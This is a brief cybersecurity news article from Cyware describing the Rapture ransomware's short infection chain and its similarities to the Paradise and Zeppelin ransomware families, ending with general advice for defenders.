Go to listing page

New Rapture Ransomware Bears Notable Similarities with Paradise

New Rapture Ransomware Bears Notable Similarities with Paradise
A new ransomware was found attempting to target victims while leaving minimal digital footprints. Dubbed Rapture, this ransomware has several similarities with other malware families, prominently with the Paradise ransomware.

A short infection chain

The malware, detected in March and April, has a very short operational cycle. Its infection chain, starting from the discovery phase to the ransom demand, takes just three to five days.
  • The attack begins with a scan of the system, including a check for the PowerShell version, Log4j applet installations, and configured firewall policies.
  • After reconnaissance, the first stage of the attack is initiated by downloading a PowerShell script and running it to install Cobalt Strike on the victim’s machine.
  • It then attempts to get access to the network, probably via public-facing websites and servers.
  • It further attempts to elevate privileges and inject malicious code into an existing process (svchost.exe) to drop the second stage Cobalt Strike beacon downloader. Lastly, the malware establishes a connection with the C2 and receives commands and other payloads from there.

Similarities with other malware

Researchers observed that the architecture and operations of Rapture bear several similarities with other known malware.
  • During the malware execution, the memory dump uses an RSA key configuration file, which is similar to that used by the Paradise ransomware.
  • A .NET 4.0 framework is a prerequisite for the proper execution of Rapture. This behavior indicates further similarities with Paradise, which is also implemented using .NET.
  • The ransom note left by the Rapture seems to be adapted from that of Zeppelin ransomware.
  • However, researchers are confident that Rapture is not a variant of any existing malware family; it is entirely a different threat.

The bottom line

Attack tactics used by the Rapture ransomware, including memory-based payload attacks and small-size infection chains, make it stealthier and difficult to analyze. This highlights the rapid evolution of evasion tactics used by malware developers, as recently observed in the case of several other threats, such as Raspberry Robin, SYS01 Campaign, Emotet, and Remcos RAT. Organizations need to proactively upgrade their defense strategies to stay current in this ever-evolving threat scenario.
Cyware Publisher

Publisher

Cyware